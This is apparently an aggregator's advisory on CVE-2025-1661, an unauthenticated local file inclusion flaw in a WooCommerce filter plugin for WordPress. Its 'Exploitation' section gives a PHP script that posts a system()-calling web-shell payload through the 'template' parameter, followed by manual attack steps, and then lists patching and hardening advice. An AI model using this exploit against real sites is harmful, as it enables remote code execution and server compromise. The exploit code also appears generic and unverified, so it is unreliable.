The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI) in all versions up to and including 1.3.6.5. This vulnerability arises via the ‘template’ parameter of the `woof_text_search` AJAX action. Unauthenticated attackers can exploit this flaw to include and execute arbitrary files on the server. By manipulating the ‘template’ parameter, an attacker can force the server to include malicious PHP files, leading to arbitrary code execution. This can bypass access controls, expose sensitive data, or allow full server compromise, especially in scenarios where attackers can upload seemingly harmless files like images that contain embedded PHP code.
The vulnerability is particularly dangerous because it requires no authentication, making it accessible to any remote attacker. The CVSS 4.0 severity score reflects its critical nature, emphasizing the potential for widespread exploitation. Attackers can leverage this flaw to execute PHP code, escalate privileges, or exfiltrate sensitive information from the server.
DailyCVE Form:
Platform: WordPress
Version: <= 1.3.6.5
Vulnerability: Local File Inclusion
Severity: Critical
Date: 03/11/2025
What Undercode Say:
Exploitation:
1. Exploit Code Example:
<?php $url = "http://target-site.com/wp-admin/admin-ajax.php"; $params = array( 'action' => 'woof_text_search', 'template' => 'php://input' ); $payload = "<?php system($_GET[bash]); ?>"; $response = file_get_contents($url . '?' . http_build_query($params), false, stream_context_create(array( 'http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $payload ) )); echo $response; ?>
This script sends a malicious payload to the vulnerable endpoint, exploiting the LFI vulnerability to execute arbitrary commands.
2. Manual Exploit Steps:
- Identify the target WordPress site using the vulnerable plugin.
- Craft a malicious request to the `woof_text_search` AJAX action with the ‘template’ parameter pointing to a malicious file.
- Use tools like `curl` or browser dev tools to send the payload.
Protection:
1. Patch Application:
- Update the HUSKY – Products Filter Professional for WooCommerce plugin to the latest version beyond 1.3.6.5.
2. Server Hardening:
- Restrict file upload permissions and disable PHP execution in upload directories.
- Use a Web Application Firewall (WAF) to block malicious requests.
3. Code Review:
- Audit plugin code for insecure file inclusion practices.
- Validate and sanitize all user inputs, especially parameters used in file operations.
4. Mitigation Commands:
- Apache: Add `php_admin_flag engine off` to upload directories in
.htaccess. - Nginx: Use `location ~ \.php$ { deny all; }` to block PHP execution in specific directories.
5. Monitoring:
- Enable logging for AJAX requests and monitor for unusual patterns.
- Use intrusion detection systems (IDS) to flag potential exploitation attempts.
6. Backup:
- Regularly back up the WordPress site and database to ensure quick recovery in case of compromise.
By following these steps, administrators can mitigate the risk posed by CVE-2025-1661 and protect their WordPress installations from exploitation.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1661
Extra Source Hub:
Undercode
